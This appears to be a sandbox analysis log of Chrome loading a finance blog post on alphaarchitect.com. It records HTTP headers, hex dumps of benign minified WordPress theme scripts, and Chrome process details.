                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                        Age: 147821
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f4fba362c9142a6-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        2024-12-20 12:45:04 UTC878INData Raw: 36 61 65 0d 0a 76 61 72 20 61 77 62 4d 65 67 61 6d 65 6e 75 50 6f 73 69 74 69 6f 6e 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 2c 61 2c 72 3d 74 2e 63 6c 6f 73 65 73 74 28 22 6e 61 76 22 29 2c 69 3d 72 2e 68 61 73 43 6c 61 73 73 28 22 61 77 62 2d 6d 65 6e 75 5f 63 6f 6c 75 6d 6e 22 29 3f 22 63 6f 6c 75 6d 6e 22 3a 22 72 6f 77 22 2c 6f 3d 72 2e 61 74 74 72 28 22 64 61 74 61 2d 65 78 70 61 6e 64 22 29 2c 75 3d 22 72 69 67 68 74 22 3d 3d 3d 6f 3f 22 6c 65 66 74 22 3a 22 72 69 67 68 74 22 2c 73 3d 74 2e 61 74 74 72 28 22 64 61 74 61 2d 77 69 64 74 68 22 29 2c 6e 3d 6a 51 75 65 72 79 28 77 69 6e 64 6f 77 29 2e 77 69 64 74 68 28 29 2c 6c 3d 74 2e 63 6c 6f 73 65 73 74 28 22 6c 69 22 29 2c 68 3d 74 2e 6f 75 74 65 72 57 69 64 74 68 28 29 2c 77 3d 6e 2d
                                                                                                                                                                                                                                                                        Data Ascii: 6aevar awbMegamenuPosition=function(t){var e,a,r=t.closest("nav"),i=r.hasClass("awb-menu_column")?"column":"row",o=r.attr("data-expand"),u="right"===o?"left":"right",s=t.attr("data-width"),n=jQuery(window).width(),l=t.closest("li"),h=t.outerWidth(),w=n-
                                                                                                                                                                                                                                                                        2024-12-20 12:45:04 UTC839INData Raw: 67 68 74 29 2c 63 2e 72 69 67 68 74 3d 22 61 75 74 6f 22 29 3a 66 2e 6c 65 66 74 3e 68 2f 32 3f 28 63 2e 6c 65 66 74 3d 22 61 75 74 6f 22 2c 63 2e 72 69 67 68 74 3d 22 61 75 74 6f 22 29 3a 28 63 2e 6c 65 66 74 3d 22 61 75 74 6f 22 2c 63 2e 72 69 67 68 74 3d 2d 31 2a 28 68 2d 66 2e 6c 65 66 74 29 29 29 3a 28 66 3d 7b 72 69 67 68 74 3a 6e 2d 61 2c 6c 65 66 74 3a 61 2b 6c 2e 6f 75 74 65 72 57 69 64 74 68 28 29 7d 29 5b 6f 5d 3e 68 3f 28 63 5b 75 5d 3d 30 2c 63 5b 6f 5d 3d 22 61 75 74 6f 22 29 3a 66 5b 75 5d 3e 68 3f 28 63 5b 6f 5d 3d 30 2c 63 5b 75 5d 3d 22 61 75 74 6f 22 29 3a 28 63 5b 75 5d 3d 2d 31 2a 28 68 2d 66 5b 6f 5d 29 2c 63 5b 6f 5d 3d 22 61 75 74 6f 22 29 2c 74 2e 63 73 73 28 63 29 29 3a 28 66 3d 7b 72 69 67 68 74 3a 6e 2d 28 61 2b 6c 2e 6f 75 74
                                                                                                                                                                                                                                                                        Data Ascii: ght),c.right="auto"):f.left>h/2?(c.left="auto",c.right="auto"):(c.left="auto",c.right=-1*(h-f.left))):(f={right:n-a,left:a+l.outerWidth()})[o]>h?(c[u]=0,c[o]="auto"):f[u]>h?(c[o]=0,c[u]="auto"):(c[u]=-1*(h-f[o]),c[o]="auto"),t.css(c)):(f={right:n-(a+l.out
                                                                                                                                                                                                                                                                        2024-12-20 12:45:04 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        146192.168.2.449904141.193.213.114435808C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-20 12:45:04 UTC623OUTGET /wp-content/cache/min/1/wp-content/themes/Avada/includes/lib/assets/min/js/general/fusion-tooltip.js?ver=1733842125 HTTP/1.1
                                                                                                                                                                                                                                                                        Host: alphaarchitect.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                        Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
                                                                                                                                                                                                                                                                        2024-12-20 12:45:05 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 20 Dec 2024 12:45:05 GMT
                                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Last-Modified: Tue, 10 Dec 2024 14:48:45 GMT
                                                                                                                                                                                                                                                                        ETag: W/"675854cd-350"
                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                        Age: 147822
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f4fba3b8a5f0c76-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        2024-12-20 12:45:05 UTC855INData Raw: 33 35 30 0d 0a 66 75 6e 63 74 69 6f 6e 20 66 75 73 69 6f 6e 49 6e 69 74 54 6f 6f 6c 74 69 70 73 28 29 7b 6a 51 75 65 72 79 28 27 5b 64 61 74 61 2d 74 6f 67 67 6c 65 3d 22 74 6f 6f 6c 74 69 70 22 5d 27 29 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3b 65 3d 6a 51 75 65 72 79 28 74 68 69 73 29 2e 70 61 72 65 6e 74 73 28 22 2e 66 75 73 69 6f 6e 2d 68 65 61 64 65 72 2d 77 72 61 70 70 65 72 22 29 2e 6c 65 6e 67 74 68 3f 22 2e 66 75 73 69 6f 6e 2d 68 65 61 64 65 72 2d 77 72 61 70 70 65 72 22 3a 6a 51 75 65 72 79 28 74 68 69 73 29 2e 70 61 72 65 6e 74 73 28 22 23 73 69 64 65 2d 68 65 61 64 65 72 22 29 2e 6c 65 6e 67 74 68 3f 22 23 73 69 64 65 2d 68 65 61 64 65 72 22 3a 22 62 6f 64 79 22 2c 28 21 63 73 73 75 61 2e 75 61 2e 6d 6f 62 69 6c 65
                                                                                                                                                                                                                                                                        Data Ascii: 350function fusionInitTooltips(){jQuery('[data-toggle="tooltip"]').each(function(){var e;e=jQuery(this).parents(".fusion-header-wrapper").length?".fusion-header-wrapper":jQuery(this).parents("#side-header").length?"#side-header":"body",(!cssua.ua.mobile
                                                                                                                                                                                                                                                                        2024-12-20 12:45:05 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        147192.168.2.449905141.193.213.104435808C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-20 12:45:05 UTC820OUTGET /wp-content/cache/min/1/wp-content/themes/Avada/assets/min/js/general/avada-fade.js?ver=1733842125 HTTP/1.1
                                                                                                                                                                                                                                                                        Host: alphaarchitect.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                        Referer: https://alphaarchitect.com/2024/12/long-term-expected-returns/
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                        Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
                                                                                                                                                                                                                                                                        2024-12-20 12:45:05 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 20 Dec 2024 12:45:05 GMT
                                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Last-Modified: Tue, 10 Dec 2024 14:48:45 GMT
                                                                                                                                                                                                                                                                        ETag: W/"675854cd-1ef"
                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                        Age: 147822
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f4fba3cbe56424b-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        2024-12-20 12:45:05 UTC502INData Raw: 31 65 66 0d 0a 76 61 72 20 61 76 61 64 61 54 72 69 67 67 65 72 50 61 67 65 54 69 74 6c 65 46 61 64 69 6e 67 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 6f 69 64 20 30 3d 3d 3d 63 73 73 75 61 2e 75 61 2e 6d 6f 62 69 6c 65 26 26 28 22 31 22 21 3d 3d 61 76 61 64 61 46 61 64 65 56 61 72 73 2e 70 61 67 65 5f 74 69 74 6c 65 5f 66 61 64 69 6e 67 26 26 31 21 3d 3d 61 76 61 64 61 46 61 64 65 56 61 72 73 2e 70 61 67 65 5f 74 69 74 6c 65 5f 66 61 64 69 6e 67 26 26 21 30 21 3d 3d 61 76 61 64 61 46 61 64 65 56 61 72 73 2e 70 61 67 65 5f 74 69 74 6c 65 5f 66 61 64 69 6e 67 7c 7c 28 22 6c 65 66 74 22 3d 3d 3d 61 76 61 64 61 46 61 64 65 56 61 72 73 2e 68 65 61 64 65 72 5f 70 6f 73 69 74 69 6f 6e 7c 7c 22 72 69 67 68 74 22 3d 3d 3d 61 76 61 64 61 46 61 64 65 56 61 72 73 2e 68
                                                                                                                                                                                                                                                                        Data Ascii: 1efvar avadaTriggerPageTitleFading=function(){void 0===cssua.ua.mobile&&("1"!==avadaFadeVars.page_title_fading&&1!==avadaFadeVars.page_title_fading&&!0!==avadaFadeVars.page_title_fading||("left"===avadaFadeVars.header_position||"right"===avadaFadeVars.h
                                                                                                                                                                                                                                                                        2024-12-20 12:45:05 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        148192.168.2.449906141.193.213.114435808C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-20 12:45:05 UTC627OUTGET /wp-content/cache/min/1/wp-content/plugins/fusion-builder/assets/js/min/general/awb-background-slider.js?ver=1733842125 HTTP/1.1
                                                                                                                                                                                                                                                                        Host: alphaarchitect.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                        Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
                                                                                                                                                                                                                                                                        2024-12-20 12:45:05 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 20 Dec 2024 12:45:05 GMT
                                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Last-Modified: Tue, 10 Dec 2024 14:48:45 GMT
                                                                                                                                                                                                                                                                        ETag: W/"675854cd-80c"
                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                        Age: 147822
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f4fba3ce8351899-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        2024-12-20 12:45:05 UTC878INData Raw: 38 30 63 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 6f 6e 73 74 20 74 3d 7b 73 6c 69 64 65 3a 7b 70 72 65 76 3a 7b 74 72 61 6e 73 6c 61 74 65 3a 5b 30 2c 22 2d 31 30 30 25 22 2c 30 5d 2c 6f 70 61 63 69 74 79 3a 30 7d 2c 6e 65 78 74 3a 7b 74 72 61 6e 73 6c 61 74 65 3a 5b 30 2c 22 31 30 30 25 22 2c 30 5d 2c 6f 70 61 63 69 74 79 3a 30 7d 7d 2c 73 6c 69 64 65 5f 64 6f 77 6e 3a 7b 70 72 65 76 3a 7b 74 72 61 6e 73 6c 61 74 65 3a 5b 30 2c 22 31 30 30 25 22 2c 30 5d 2c 6f 70 61 63 69 74 79 3a 30 7d 2c 6e 65 78 74 3a 7b 74 72 61 6e 73 6c 61 74 65 3a 5b 30 2c 22 2d 31 30 30 25 22 2c 30 5d 2c 6f 70 61 63 69 74 79 3a 30 7d 7d 2c 73 6c 69 64 65 5f 6c 65 66 74 3a 7b 70 72 65 76 3a 7b 74 72 61 6e 73 6c 61 74 65 3a 5b 22 2d 31 30 30 25 22 2c 30 2c 30 5d 2c 6f 70 61
                                                                                                                                                                                                                                                                        Data Ascii: 80c!function(e){const t={slide:{prev:{translate:[0,"-100%",0],opacity:0},next:{translate:[0,"100%",0],opacity:0}},slide_down:{prev:{translate:[0,"100%",0],opacity:0},next:{translate:[0,"-100%",0],opacity:0}},slide_left:{prev:{translate:["-100%",0,0],opa
                                                                                                                                                                                                                                                                        2024-12-20 12:45:05 UTC1189INData Raw: 3d 3d 3d 6e 3f 22 66 61 64 65 22 3a 22 63 72 65 61 74 69 76 65 22 3b 6c 65 74 20 69 3d 22 63 72 65 61 74 69 76 65 22 3d 3d 3d 73 3f 74 5b 6e 5d 3a 22 22 3b 63 6f 6e 73 74 20 63 3d 22 6e 6f 22 3d 3d 3d 61 2e 64 61 74 61 73 65 74 2e 6c 6f 6f 70 2c 6c 3d 4e 75 6d 62 65 72 28 61 2e 64 61 74 61 73 65 74 2e 73 6c 69 64 65 73 68 6f 77 53 70 65 65 64 29 7c 7c 35 65 33 2c 72 3d 4e 75 6d 62 65 72 28 61 2e 64 61 74 61 73 65 74 2e 61 6e 69 6d 61 74 69 6f 6e 53 70 65 65 64 29 7c 7c 38 30 30 2c 64 3d 61 2e 64 61 74 61 73 65 74 2e 64 69 72 65 63 74 69 6f 6e 7c 7c 22 75 70 22 2c 70 3d 61 2e 64 61 74 61 73 65 74 2e 70 61 75 73 65 5f 6f 6e 5f 68 6f 76 65 72 7c 7c 21 31 3b 6c 65 74 20 75 3d 22 2e 66 75 73 69 6f 6e 2d 66 6c 65 78 2d 63 6f 6e 74 61 69 6e 65 72 22 3b 22 63 6f
                                                                                                                                                                                                                                                                        Data Ascii: ===n?"fade":"creative";let i="creative"===s?t[n]:"";const c="no"===a.dataset.loop,l=Number(a.dataset.slideshowSpeed)||5e3,r=Number(a.dataset.animationSpeed)||800,d=a.dataset.direction||"up",p=a.dataset.pause_on_hover||!1;let u=".fusion-flex-container";"co
                                                                                                                                                                                                                                                                        2024-12-20 12:45:05 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        149192.168.2.449907141.193.213.104435808C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-20 12:45:05 UTC822OUTGET /wp-content/cache/min/1/wp-content/themes/Avada/assets/min/js/general/avada-to-top.js?ver=1733842125 HTTP/1.1
                                                                                                                                                                                                                                                                        Host: alphaarchitect.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                        Referer: https://alphaarchitect.com/2024/12/long-term-expected-returns/
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                        Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
                                                                                                                                                                                                                                                                        2024-12-20 12:45:05 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 20 Dec 2024 12:45:05 GMT
                                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Last-Modified: Tue, 10 Dec 2024 14:48:45 GMT
                                                                                                                                                                                                                                                                        ETag: W/"675854cd-3f8"
                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                        Age: 147822
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f4fba3e5ad10c8e-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        2024-12-20 12:45:05 UTC878INData Raw: 33 66 38 0d 0a 66 75 6e 63 74 69 6f 6e 20 61 76 61 64 61 55 70 64 61 74 65 54 6f 54 6f 70 50 6f 73 74 69 6f 6e 28 29 7b 76 61 72 20 6f 3d 61 76 61 64 61 54 6f 54 6f 70 56 61 72 73 2e 74 6f 74 6f 70 5f 70 6f 73 69 74 69 6f 6e 2e 73 70 6c 69 74 28 22 5f 22 29 3b 6f 3d 32 3d 3d 3d 6f 2e 6c 65 6e 67 74 68 3f 22 74 6f 2d 74 6f 70 2d 22 2b 6f 5b 30 5d 2b 22 20 74 6f 2d 74 6f 70 2d 22 2b 6f 5b 31 5d 3a 22 74 6f 2d 74 6f 70 2d 22 2b 6f 5b 30 5d 2c 6a 51 75 65 72 79 28 22 2e 74 6f 2d 74 6f 70 2d 63 6f 6e 74 61 69 6e 65 72 22 29 2e 61 74 74 72 28 22 63 6c 61 73 73 22 2c 22 74 6f 2d 74 6f 70 2d 63 6f 6e 74 61 69 6e 65 72 22 29 2c 6a 51 75 65 72 79 28 22 2e 74 6f 2d 74 6f 70 2d 63 6f 6e 74 61 69 6e 65 72 22 29 2e 61 64 64 43 6c 61 73 73 28 6f 29 7d 6a 51 75 65 72 79
                                                                                                                                                                                                                                                                        Data Ascii: 3f8function avadaUpdateToTopPostion(){var o=avadaToTopVars.totop_position.split("_");o=2===o.length?"to-top-"+o[0]+" to-top-"+o[1]:"to-top-"+o[0],jQuery(".to-top-container").attr("class","to-top-container"),jQuery(".to-top-container").addClass(o)}jQuery
                                                                                                                                                                                                                                                                        2024-12-20 12:45:05 UTC145INData Raw: 76 65 22 29 3a 6a 51 75 65 72 79 28 22 2e 66 75 73 69 6f 6e 2d 74 6f 70 2d 74 6f 70 2d 6c 69 6e 6b 22 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 22 66 75 73 69 6f 6e 2d 74 6f 2d 74 6f 70 2d 61 63 74 69 76 65 22 29 2c 6f 3d 61 7d 29 2c 6a 51 75 65 72 79 28 77 69 6e 64 6f 77 29 2e 6f 6e 28 22 75 70 64 61 74 65 54 6f 54 6f 70 50 6f 73 74 69 6f 6e 22 2c 61 76 61 64 61 55 70 64 61 74 65 54 6f 54 6f 70 50 6f 73 74 69 6f 6e 29 7d 29 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: ve"):jQuery(".fusion-top-top-link").removeClass("fusion-to-top-active"),o=a}),jQuery(window).on("updateToTopPostion",avadaUpdateToTopPostion)})
                                                                                                                                                                                                                                                                        2024-12-20 12:45:05 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                                                                        Target ID:0
                                                                                                                                                                                                                                                                        Start time:07:44:24
                                                                                                                                                                                                                                                                        Start date:20/12/2024
                                                                                                                                                                                                                                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                                                                                                                                                                                                                                                        Imagebase:0x7ff76e190000
                                                                                                                                                                                                                                                                        File size:3'242'272 bytes
                                                                                                                                                                                                                                                                        MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                                                        Target ID:2
                                                                                                                                                                                                                                                                        Start time:07:44:28
                                                                                                                                                                                                                                                                        Start date:20/12/2024
                                                                                                                                                                                                                                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2184 --field-trial-handle=1972,i,15189473384980414262,1618065118373367696,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                                                                                                        Imagebase:0x7ff76e190000
                                                                                                                                                                                                                                                                        File size:3'242'272 bytes
                                                                                                                                                                                                                                                                        MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                                                        Target ID:3
                                                                                                                                                                                                                                                                        Start time:07:44:35
                                                                                                                                                                                                                                                                        Start date:20/12/2024
                                                                                                                                                                                                                                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://alphaarchitect.com/2024/12/long-term-expected-returns/"
                                                                                                                                                                                                                                                                        Imagebase:0x7ff76e190000
                                                                                                                                                                                                                                                                        File size:3'242'272 bytes
                                                                                                                                                                                                                                                                        MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                        No disassembly